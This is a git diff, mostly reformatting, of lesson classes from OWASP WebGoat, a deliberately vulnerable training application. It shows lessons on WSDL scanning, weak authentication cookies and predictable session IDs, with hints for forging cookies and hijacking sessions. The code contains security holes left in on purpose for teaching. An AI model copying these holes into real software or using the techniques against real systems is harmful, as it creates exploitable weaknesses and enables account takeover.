-												  + "handled according to our <U>Privacy Policy</U>.").setColSpan(2));
+											"We value your comments.  " + "To send OWASP your questions or comments "
+													+ "regarding the WebGoat tool, please enter your "
+													+ "comments below.  The information you provide will be "
+													+ "handled according to our <U>Privacy Policy</U>.").setColSpan(2));
 		tr.addElement(new TD().addElement(
-										  "<b>OWASP</B><BR>" + "9175 Guilford Rd <BR> Suite 300 <BR>"
-												  + "Columbia, MD.  21046").setVAlign("top"));
+											"<b>OWASP</B><BR>" + "9175 Guilford Rd <BR> Suite 300 <BR>"
+													+ "Columbia, MD.  21046").setVAlign("top"));
 		t.addElement(tr);
 
 		tr = new TR();
@@ -325,7 +322,7 @@ public class UncheckedEmail extends LessonAdapter
 	}
 
 	private Message sendGoogleMail(String recipients, String subject, String message, String from,
-								   final String mailAccount, final String mailPassword) throws MessagingException
+			final String mailAccount, final String mailPassword) throws MessagingException
 	{
 		boolean debug = false;
 
@@ -402,10 +399,9 @@ public class UncheckedEmail extends LessonAdapter
 	 */
 	public String getInstructions(WebSession s)
 	{
-		String instructions =
-				"This form is an example of a customer support page.  Using the form below try to:<br>"
-						+ "1) Send a malicious script to the website admin.<br>"
-						+ "2) Send a malicious script to a 'friend' from OWASP.<br>";
+		String instructions = "This form is an example of a customer support page.  Using the form below try to:<br>"
+				+ "1) Send a malicious script to the website admin.<br>"
+				+ "2) Send a malicious script to a 'friend' from OWASP.<br>";
 		return (instructions);
 	}
 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
index 30e96f3d2..a69192ac5 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WSDLScanning.java
@@ -1,9 +1,8 @@
 /*
- * Created on May 26, 2005
- *
- * TODO To change the template for this generated file go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * Created on May 26, 2005 TODO To change the template for this generated file go to Window -
+ * Preferences - Java - Code Style - Code Templates
  */
+
 package org.owasp.webgoat.lessons;
 
 import java.rmi.RemoteException;
@@ -13,11 +12,9 @@ import java.sql.ResultSet;
 import java.sql.SQLException;
 import java.util.ArrayList;
 import java.util.List;
-
 import javax.xml.namespace.QName;
 import javax.xml.rpc.ParameterMode;
 import javax.xml.rpc.ServiceException;
-
 import org.apache.axis.client.Call;
 import org.apache.axis.client.Service;
 import org.apache.axis.encoding.XMLType;
@@ -33,327 +30,288 @@ import org.apache.ecs.html.Select;
 import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.DatabaseUtilities;
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.WebSession;
 import org.owasp.webgoat.session.WebgoatContext;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
+ * 
  * @author asmolen
- *
- * TODO To change the template for this generated type comment go to
- * Window - Preferences - Java - Code Style - Code Templates
+ * 
+ * TODO To change the template for this generated type comment go to Window - Preferences - Java -
+ * Code Style - Code Templates
  */
 public class WSDLScanning extends LessonAdapter
 {
 
-    static boolean completed = false;
+	static boolean completed = false;
 
-    static boolean beenRestartedYet = false;
+	static boolean beenRestartedYet = false;
 
-    public final static String firstName = "getFirstName";
+	public final static String firstName = "getFirstName";
 
-    public final static String lastName = "getLastName";
+	public final static String lastName = "getLastName";
 
-    public final static String loginCount = "getLoginCount";
+	public final static String loginCount = "getLoginCount";
 
-    public final static String ccNumber = "getCreditCard";
+	public final static String ccNumber = "getCreditCard";
 
-    final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg")
-	    .setAlt("Parasoft").setBorder(0).setHspace(0).setVspace(0);
+	final static IMG CREDITS_LOGO = new IMG("images/logos/parasoft.jpg").setAlt("Parasoft").setBorder(0).setHspace(0)
+			.setVspace(0);
 
 	private static WebgoatContext webgoatContext;
-	
+
 	/**
-	 * We maintain a static reference to WebgoatContext, since this class
-	 * is also automatically instantiated by the Axis web services module,
-	 * which does not call setWebgoatContext()
+	 * We maintain a static reference to WebgoatContext, since this class is also automatically
+	 * instantiated by the Axis web services module, which does not call setWebgoatContext()
 	 * (non-Javadoc)
+	 * 
 	 * @see org.owasp.webgoat.lessons.AbstractLesson#setWebgoatContext(org.owasp.webgoat.session.WebgoatContext)
 	 */
 	@Override
-	public void setWebgoatContext(WebgoatContext webgoatContext) {
+	public void setWebgoatContext(WebgoatContext webgoatContext)
+	{
 		WSDLScanning.webgoatContext = webgoatContext;
 	}
-	
+
 	@Override
-	public WebgoatContext getWebgoatContext() {
+	public WebgoatContext getWebgoatContext()
+	{
 		return WSDLScanning.webgoatContext;
 	}
 
-    protected Category getDefaultCategory()
-    {
-	return Category.WEB_SERVICES;
-    }
-
-
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints
-		.add("Try connecting to the WSDL with a browser or Web Service tool.");
-	hints
-		.add("Sometimes the WSDL will define methods that are not available through a web API. "
-			+ "Try to find operations that are in the WSDL, but not part of this API");
-	hints
-		.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
-			+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
-	hints
-		.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(120);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    public String getTitle()
-    {
-	return "WSDL Scanning";
-    }
-
-
-    public Object accessWGService(String serv, int port, String proc,
-	    String parameterName, Object parameterValue)
-    {
-	String targetNamespace = "WebGoat";
-	try
+	protected Category getDefaultCategory()
 	{
-	    QName serviceName = new QName(targetNamespace, serv);
-	    QName operationName = new QName(targetNamespace, proc);
-	    Service service = new Service();
-	    Call call = (Call) service.createCall();
-	    call.setOperationName(operationName);
-	    call.addParameter(parameterName, serviceName, ParameterMode.INOUT);
-	    call.setReturnType(XMLType.XSD_STRING);
-	    call.setUsername("guest");
-	    call.setPassword("guest");
-	    call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/"
-		    + serv);
-	    Object result = call.invoke(new Object[] { parameterValue });
-	    return result;
+		return Category.WEB_SERVICES;
 	}
-	catch (RemoteException e)
+
+	protected List<String> getHints(WebSession s)
 	{
-	    e.printStackTrace();
+		List<String> hints = new ArrayList<String>();
+		hints.add("Try connecting to the WSDL with a browser or Web Service tool.");
+		hints.add("Sometimes the WSDL will define methods that are not available through a web API. "
+				+ "Try to find operations that are in the WSDL, but not part of this API");
+		hints.add("The URL for the web service is: http://localost/WebGoat/services/WSDLScanning <br>"
+				+ "The WSDL can usually be viewed by adding a ?WSDL on the end of the request.");
+		hints.add("Look in the WSDL for the getCreditCard operation and insert the field in an intercepted request.");
+		return hints;
 	}
-	catch (ServiceException e)
+
+	private final static Integer DEFAULT_RANKING = new Integer(120);
+
+	protected Integer getDefaultRanking()
 	{
-	    e.printStackTrace();
+		return DEFAULT_RANKING;
 	}
-	catch (Exception e)
+
+	public String getTitle()
 	{
-	    e.printStackTrace();
+		return "WSDL Scanning";
 	}
-	return null;
-    }
 
-
-    protected Element createContent(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
-
-	if (s.isColor())
+	public Object accessWGService(String serv, int port, String proc, String parameterName, Object parameterValue)
 	{
-	    t1.setBorder(1);
-	}
-	TR tr = new TR();
-	tr.addElement(new TD("Enter your account number: "));
-	tr.addElement(new TD(new Input(Input.TEXT, "id", "101")));
-	t1.addElement(tr);
-
-	tr = new TR();
-	tr.addElement(new TD("Select the fields to return: "));
-	tr.addElement(new TD(new Select("field").setMultiple(true).addElement(
-		new Option(firstName).addElement("First Name")).addElement(
-		new Option(lastName).addElement("Last Name")).addElement(
-		new Option(loginCount).addElement("Login Count"))));
-	t1.addElement(tr);
-
-	tr = new TR();
-	Element b = ECSFactory.makeButton("Submit");
-	tr.addElement(new TD(b).setAlign("CENTER").setColSpan(2));
-	t1.addElement(tr);
-
-	ec.addElement(t1);
-
-	try
-	{
-	    String[] fields = s.getParser().getParameterValues("field");
-	    int id = s.getParser().getIntParameter("id");
-
-	    Table t = new Table().setCellSpacing(0).setCellPadding(2)
-		    .setBorder(1);
-
-	    if (s.isColor())
-	    {
-		t.setBorder(1);
-	    }
-	    TR header = new TR();
-	    TR results = new TR();
-	    int port = s.getRequest().getServerPort();
-	    for (int i = 0; i < fields.length; i++)
-	    {
-		header.addElement(new TD().addElement(fields[i]));
-		results.addElement(new TD()
-			.addElement((String) accessWGService("WSDLScanning", port,
-				fields[i], "acct_num", new Integer(id))));
-	    }
-	    if (fields.length == 0)
-	    {
-		s.setMessage("Please select a value to return.");
-	    }
-	    t.addElement(header);
-	    t.addElement(results);
-	    ec.addElement(new P().addElement(t));
-	}
-	catch (Exception e)
-	{
-
-	}
-	try
-	{
-	    A a = new A("services/WSDLScanning?WSDL", "WebGoat WSDL File");
-	    ec
-		    .addElement(new P()
-			    .addElement("View the web services definition language (WSDL) to see the complete API:"));
-	    ec.addElement(new BR());
-	    ec.addElement(a);
-	    //getLessonTracker( s ).setCompleted( completed );
-
-	    if (completed && !getLessonTracker(s).getCompleted()
-		    && !beenRestartedYet)
-	    {
-		makeSuccess(s);
-		beenRestartedYet = true;
-	    }
-	    else if (completed && !getLessonTracker(s).getCompleted()
-		    && beenRestartedYet)
-	    {
-		completed = false;
-		beenRestartedYet = false;
-	    }
-
-	    //            accessWGService("WSDLScanning", "getCreditCard", "acct_num", new Integer(101));
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
-	}
-	return (ec);
-    }
-
-
-    public String getResults(int id, String field)
-    {
-	try
-	{
-	    Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
-	    PreparedStatement ps = connection
-		    .prepareStatement("SELECT * FROM user_data WHERE userid = ?");
-	    ps.setInt(1, id);
-	    try
-	    {
-		ResultSet results = ps.executeQuery();
-		if ((results != null) && (results.next() == true))
+		String targetNamespace = "WebGoat";
+		try
 		{
-		    return results.getString(field);
+			QName serviceName = new QName(targetNamespace, serv);
+			QName operationName = new QName(targetNamespace, proc);
+			Service service = new Service();
+			Call call = (Call) service.createCall();
+			call.setOperationName(operationName);
+			call.addParameter(parameterName, serviceName, ParameterMode.INOUT);
+			call.setReturnType(XMLType.XSD_STRING);
+			call.setUsername("guest");
+			call.setPassword("guest");
+			call.setTargetEndpointAddress("http://localhost:" + port + "/WebGoat/services/" + serv);
+			Object result = call.invoke(new Object[] { parameterValue });
+			return result;
+		} catch (RemoteException e)
+		{
+			e.printStackTrace();
+		} catch (ServiceException e)
+		{
+			e.printStackTrace();
+		} catch (Exception e)
+		{
+			e.printStackTrace();
 		}
-	    }
-	    catch (SQLException sqle)
-	    {}
+		return null;
 	}
-	catch (Exception e)
-	{}
-	return null;
-    }
 
-
-    public String getCreditCard(int id)
-    {
-	String result = getResults(id, "cc_number");
-	if (result != null)
+	protected Element createContent(WebSession s)
 	{
-	    completed = true;
-	    return result;
+		ElementContainer ec = new ElementContainer();
+
+		Table t1 = new Table().setCellSpacing(0).setCellPadding(2);
+
+		if (s.isColor())
+		{
+			t1.setBorder(1);
+		}
+		TR tr = new TR();
+		tr.addElement(new TD("Enter your account number: "));
+		tr.addElement(new TD(new Input(Input.TEXT, "id", "101")));
+		t1.addElement(tr);
+
+		tr = new TR();
+		tr.addElement(new TD("Select the fields to return: "));
+		tr.addElement(new TD(new Select("field").setMultiple(true).addElement(
+																				new Option(firstName)
+																						.addElement("First Name"))
+				.addElement(new Option(lastName).addElement("Last Name"))
+				.addElement(new Option(loginCount).addElement("Login Count"))));
+		t1.addElement(tr);
+
+		tr = new TR();
+		Element b = ECSFactory.makeButton("Submit");
+		tr.addElement(new TD(b).setAlign("CENTER").setColSpan(2));
+		t1.addElement(tr);
+
+		ec.addElement(t1);
+
+		try
+		{
+			String[] fields = s.getParser().getParameterValues("field");
+			int id = s.getParser().getIntParameter("id");
+
+			Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1);
+
+			if (s.isColor())
+			{
+				t.setBorder(1);
+			}
+			TR header = new TR();
+			TR results = new TR();
+			int port = s.getRequest().getServerPort();
+			for (int i = 0; i < fields.length; i++)
+			{
+				header.addElement(new TD().addElement(fields[i]));
+				results.addElement(new TD().addElement((String) accessWGService("WSDLScanning", port, fields[i],
+																				"acct_num", new Integer(id))));
+			}
+			if (fields.length == 0)
+			{
+				s.setMessage("Please select a value to return.");
+			}
+			t.addElement(header);
+			t.addElement(results);
+			ec.addElement(new P().addElement(t));
+		} catch (Exception e)
+		{
+
+		}
+		try
+		{
+			A a = new A("services/WSDLScanning?WSDL", "WebGoat WSDL File");
+			ec.addElement(new P()
+					.addElement("View the web services definition language (WSDL) to see the complete API:"));
+			ec.addElement(new BR());
+			ec.addElement(a);
+			// getLessonTracker( s ).setCompleted( completed );
+
+			if (completed && !getLessonTracker(s).getCompleted() && !beenRestartedYet)
+			{
+				makeSuccess(s);
+				beenRestartedYet = true;
+			}
+			else if (completed && !getLessonTracker(s).getCompleted() && beenRestartedYet)
+			{
+				completed = false;
+				beenRestartedYet = false;
+			}
+
+			// accessWGService("WSDLScanning", "getCreditCard", "acct_num", new Integer(101));
+		} catch (Exception e)
+		{
+			s.setMessage("Error generating " + this.getClass().getName());
+			e.printStackTrace();
+		}
+		return (ec);
 	}
-	return null;
-    }
 
-
-    public String getFirstName(int id)
-    {
-	String result = getResults(id, "first_name");
-	if (result != null)
+	public String getResults(int id, String field)
 	{
-	    return result;
+		try
+		{
+			Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext());
+			PreparedStatement ps = connection.prepareStatement("SELECT * FROM user_data WHERE userid = ?");
+			ps.setInt(1, id);
+			try
+			{
+				ResultSet results = ps.executeQuery();
+				if ((results != null) && (results.next() == true)) { return results.getString(field); }
+			} catch (SQLException sqle)
+			{
+			}
+		} catch (Exception e)
+		{
+		}
+		return null;
 	}
-	return null;
-    }
 
-
-    public String getLastName(int id)
-    {
-	String result = getResults(id, "last_name");
-	if (result != null)
+	public String getCreditCard(int id)
 	{
-	    return result;
+		String result = getResults(id, "cc_number");
+		if (result != null)
+		{
+			completed = true;
+			return result;
+		}
+		return null;
 	}
-	return null;
-    }
 
-
-    public String getLoginCount(int id)
-    {
-	String result = getResults(id, "login_count");
-	if (result != null)
+	public String getFirstName(int id)
 	{
-	    return result;
+		String result = getResults(id, "first_name");
+		if (result != null) { return result; }
+		return null;
 	}
-	return null;
-    }
 
+	public String getLastName(int id)
+	{
+		String result = getResults(id, "last_name");
+		if (result != null) { return result; }
+		return null;
+	}
 
-    public Element getCredits()
-    {
-	return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
-    }
+	public String getLoginCount(int id)
+	{
+		String result = getResults(id, "login_count");
+		if (result != null) { return result; }
+		return null;
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO);
+	}
 
 }
\ No newline at end of file
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java
index 8ca10731a..def21b08a 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakAuthenticationCookie.java
@@ -1,3 +1,4 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
@@ -18,32 +19,31 @@ import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
 import org.owasp.webgoat.session.*;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
  * 
@@ -52,8 +52,10 @@ import org.owasp.webgoat.session.*;
  */
 public class WeakAuthenticationCookie extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(
-			new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
 
 	/**
 	 * Description of the Field
@@ -90,21 +92,16 @@ public class WeakAuthenticationCookie extends LessonAdapter
 
 		if (cookie != null)
 		{
-			if (cookie.equals(encode("webgoat12345")))
-			{
-				return ("webgoat");
-			}
+			if (cookie.equals(encode("webgoat12345"))) { return ("webgoat"); }
 
-			if (cookie.equals(encode("aspect12345")))
-			{
-				return ("aspect");
-			}
+			if (cookie.equals(encode("aspect12345"))) { return ("aspect"); }
 
 			if (cookie.equals(encode("alice12345")))
 			{
 				makeSuccess(s);
 				return ("alice");
-			} else
+			}
+			else
 			{
 				s.setMessage("Invalid cookie");
 				s.eatCookies();
@@ -135,7 +132,8 @@ public class WeakAuthenticationCookie extends LessonAdapter
 			if (username.equals("webgoat") && password.equals("webgoat"))
 			{
 				loginID = encode("webgoat12345");
-			} else if (username.equals("aspect") && password.equals("aspect"))
+			}
+			else if (username.equals("aspect") && password.equals("aspect"))
 			{
 				loginID = encode("aspect12345");
 			}
@@ -147,7 +145,8 @@ public class WeakAuthenticationCookie extends LessonAdapter
 				s.getResponse().addCookie(newCookie);
 
 				return (username);
-			} else
+			}
+			else
 			{
 				s.setMessage("Invalid username and password entered.");
 			}
@@ -179,19 +178,12 @@ public class WeakAuthenticationCookie extends LessonAdapter
 		{
 			String user = checkCookie(s);
 
-			if ((user != null) && (user.length() > 0))
-			{
-				return (makeUser(s, user, "COOKIE"));
-			}
+			if ((user != null) && (user.length() > 0)) { return (makeUser(s, user, "COOKIE")); }
 
 			user = checkParams(s);
 
-			if ((user != null) && (user.length() > 0))
-			{
-				return (makeUser(s, user, "PARAMETERS"));
-			}
-		}
-		catch (Exception e)
+			if ((user != null) && (user.length() > 0)) { return (makeUser(s, user, "PARAMETERS")); }
+		} catch (Exception e)
 		{
 			s.setMessage("Error generating " + this.getClass().getName());
 			e.printStackTrace();
@@ -244,10 +236,7 @@ public class WeakAuthenticationCookie extends LessonAdapter
 
 		for (int i = 0; i < cookies.length; i++)
 		{
-			if (cookies[i].getName().equalsIgnoreCase(AUTHCOOKIE))
-			{
-				return (cookies[i].getValue());
-			}
+			if (cookies[i].getName().equalsIgnoreCase(AUTHCOOKIE)) { return (cookies[i].getValue()); }
 		}
 
 		return (null);
@@ -265,9 +254,9 @@ public class WeakAuthenticationCookie extends LessonAdapter
 		hints.add("Is the AuthCookie value guessable knowing the username and password?");
 		hints.add("Add 'AuthCookie=********;' to the Cookie: header using "
 				+ "<A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A>.");
-		hints.add("After logging in as webgoat a cookie is added. 65432ubphcfx<br/>" +
-				  "After logging in as aspect a cookie is added. 65432udfqtb<br/>" +
-				  "Is there anything similar about the cookies and the login names?");
+		hints.add("After logging in as webgoat a cookie is added. 65432ubphcfx<br/>"
+				+ "After logging in as aspect a cookie is added. 65432udfqtb<br/>"
+				+ "Is there anything similar about the cookies and the login names?");
 		return hints;
 	}
 
@@ -320,9 +309,9 @@ public class WeakAuthenticationCookie extends LessonAdapter
 		}
 
 		TR tr = new TR();
-		tr.addElement(new TH().addElement(
-				"Please sign in to your account.  See the OWASP admin if you do not have an account.").setColSpan(2)
-				.setAlign("left"));
+		tr.addElement(new TH()
+				.addElement("Please sign in to your account.  See the OWASP admin if you do not have an account.")
+				.setColSpan(2).setAlign("left"));
 		t.addElement(tr);
 
 		tr = new TR();
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java
index b331e3bed..e821fccbc 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/WeakSessionID.java
@@ -1,10 +1,9 @@
+
 package org.owasp.webgoat.lessons;
 
 import java.util.ArrayList;
 import java.util.List;
-
 import javax.servlet.http.Cookie;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -17,259 +16,249 @@ import org.apache.ecs.html.TD;
 import org.apache.ecs.html.TH;
 import org.apache.ecs.html.TR;
 import org.apache.ecs.html.Table;
-
 import org.owasp.webgoat.session.ECSFactory;
 import org.owasp.webgoat.session.ParameterNotFoundException;
 import org.owasp.webgoat.session.WebSession;
 
-/*******************************************************************************
+
+/***************************************************************************************************
  * 
  * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
  * 
  * Copyright (c) 2002 - 2007 Bruce Mayhew
  * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
  * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
  * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
  * 
  * Getting Source ==============
  * 
- * Source for this application is maintained at code.google.com, a repository
- * for free software projects.
+ * Source for this application is maintained at code.google.com, a repository for free software
+ * projects.
  * 
  * For details, please see http://code.google.com/p/webgoat/
- *
- * @author     Rogan Dawes <a href="http://dawes.za.net/rogan">Rogan Dawes</a>
- * @created    March 30, 2005
+ * 
+ * @author Rogan Dawes <a href="http://dawes.za.net/rogan">Rogan Dawes</a>
+ * @created March 30, 2005
  */
 public class WeakSessionID extends LessonAdapter
 {
-	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0));
-    /**
-     *  Description of the Field
-     */
-    protected final static String SESSIONID = "WEAKID";
+	public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com")
+			.addElement(
+						new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0)
+								.setVspace(0));
+	/**
+	 * Description of the Field
+	 */
+	protected final static String SESSIONID = "WEAKID";
 
-    /**
-     *  Description of the Field
-     */
-    protected final static String PASSWORD = "Password";
+	/**
+	 * Description of the Field
+	 */
+	protected final static String PASSWORD = "Password";
 
-    /**
-     *  Description of the Field
-     */
-    protected final static String USERNAME = "Username";
+	/**
+	 * Description of the Field
+	 */
+	protected final static String USERNAME = "Username";
 
-    protected static List<String> sessionList = new ArrayList<String>();
+	protected static List<String> sessionList = new ArrayList<String>();
 
-    protected static long seq = Math.round(Math.random() * 10240) + 10000;
+	protected static long seq = Math.round(Math.random() * 10240) + 10000;
 
-    protected static long lastTime = System.currentTimeMillis();
+	protected static long lastTime = System.currentTimeMillis();
 
-
-    /**
-     *  Gets the credits attribute of the AbstractLesson object
-     *
-     * @return    The credits value
-     */
-    public Element getCredits()
-    {
-    	return super.getCustomCredits("By Rogan Dawes of ", ASPECT_LOGO);
-    }
-
-
-    protected String newCookie(WebSession s)
-    {
-	long now = System.currentTimeMillis();
-	seq++;
-	if (seq % 29 == 0)
+	/**
+	 * Gets the credits attribute of the AbstractLesson object
+	 * 
+	 * @return The credits value
+	 */
+	public Element getCredits()
 	{
-	    String target = encode(seq++, lastTime + (now - lastTime) / 2);
-	    sessionList.add(target);
-	    s.setMessage(target);
-	    if (sessionList.size() > 100)
-		sessionList.remove(0);
-	}
-	lastTime = now;
-	return encode(seq, now);
-    }
-
-
-    private String encode(long seq, long time)
-    {
-	return new String(Long.toString(seq) + "-" + Long.toString(time));
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-	try
-	{
-	    String sessionid = s.getCookie(SESSIONID);
-	    if (sessionid != null && sessionList.indexOf(sessionid) > -1)
-	    {
-		return makeSuccess(s);
-	    }
-	    else
-	    {
-		return makeLogin(s);
-	    }
-	}
-	catch (Exception e)
-	{
-	    s.setMessage("Error generating " + this.getClass().getName());
-	    e.printStackTrace();
+		return super.getCustomCredits("By Rogan Dawes of ", ASPECT_LOGO);
 	}
 
-	return (null);
-    }
-
-
-    /**
-     *  Gets the category attribute of the WeakAuthenticationCookie object
-     *
-     * @return    The category value
-     */
-    protected Category getDefaultCategory()
-    {
-	return Category.SESSION_MANAGEMENT;
-    }
-
-
-    /**
-     *  Gets the hints attribute of the CookieScreen object
-     *
-     * @return    The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-	List<String> hints = new ArrayList<String>();
-	hints.add("The server skips authentication if you send the right cookie.");
-	hints.add("Is the cookie value predictable? Can you see gaps where someone else has acquired a cookie?");
-	hints.add("Try harder, you brute!");
-	hints.add("The first part of the cookie is a sequential number, the second part is milliseconds.");
-	hints.add("After the 29th try, the skipped identifier is printed to your screen. Use that to login.");
-	return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(90);
-
-
-    protected Integer getDefaultRanking()
-    {
-	return DEFAULT_RANKING;
-    }
-
-
-    /**
-     *  Gets the title attribute of the CookieScreen object
-     *
-     * @return    The title value
-     */
-    public String getTitle()
-    {
-	return ("Hijack a Session");
-    }
-
-
-    /**
-     *  Description of the Method
-     *
-     * @param  s  Description of the Parameter
-     * @return    Description of the Return Value
-     */
-    protected Element makeLogin(WebSession s)
-    {
-	ElementContainer ec = new ElementContainer();
-
-	String weakid = s.getCookie(SESSIONID);
-
-	if (weakid == null)
+	protected String newCookie(WebSession s)
 	{
-	    weakid = newCookie(s);
-	    Cookie cookie = new Cookie(SESSIONID, weakid);
